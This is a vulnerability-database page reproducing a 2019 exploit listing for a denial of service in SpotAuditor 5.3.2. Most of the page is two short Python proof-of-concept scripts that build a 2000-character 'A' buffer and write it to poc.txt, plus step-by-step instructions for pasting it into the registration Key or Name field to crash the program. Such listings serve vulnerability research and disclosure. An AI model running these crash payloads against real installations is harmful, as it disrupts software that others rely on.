Lucene search
K

SpotAuditor 5.3.2 Denial Of Service

🗓️ 28 Nov 2019 00:00:00Reported by ZwXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 171 Views

SpotAuditor 5.3.2 leads to Denial of Service when specific keys are used during registration.

Code
`#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service  
#Exploit Author : ZwX  
#Exploit Date: 2019-11-28  
#Vendor Homepage : http://www.nsauditor.com/  
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe  
#Tested on OS: Windows 7  
#Social: twitter.com/ZwX2a  
  
'''  
Proof of Concept (PoC):  
=======================  
  
1.Download and install SpotAuditor  
2.Run the python operating script that will create a file (poc.txt)  
3.Run the software "Register -> Enter Registration Code  
4.Copy and paste the characters in the file (poc.txt)  
5.Paste the characters in the field 'Key' and click on 'Ok'  
6.SpotAuditor Crashed  
'''  
#!/usr/bin/python  
  
http = "http//"  
buffer = "\x41" * 2000  
  
  
poc = http + buffer   
file = open("poc.txt","w")  
file.write(poc)  
file.close()  
  
print "POC Created by ZwX"  
  
  
#Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service  
#Exploit Author : ZwX  
#Exploit Date: 2019-11-28  
#Vendor Homepage : http://www.nsauditor.com/  
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe  
#Tested on OS: Windows 7  
#Social: twitter.com/ZwX2a  
#contact: [email protected]  
  
'''  
Proof of Concept (PoC):  
=======================  
  
1.Download and install SpotAuditor  
2.Run the python operating script that will create a file (poc.txt)  
3.Run the software "Register -> Enter Registration Code  
4.Copy and paste the characters in the file (poc.txt)  
5.Paste the characters in the field 'Name' and click on 'Ok'  
6.SpotAuditor Crashed  
'''  
#!/usr/bin/python  
  
http = "http//"  
buffer = "\x41" * 2000  
  
  
poc = http + buffer   
file = open("poc.txt","w")  
file.write(poc)  
file.close()  
  
print "POC Created by ZwX"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation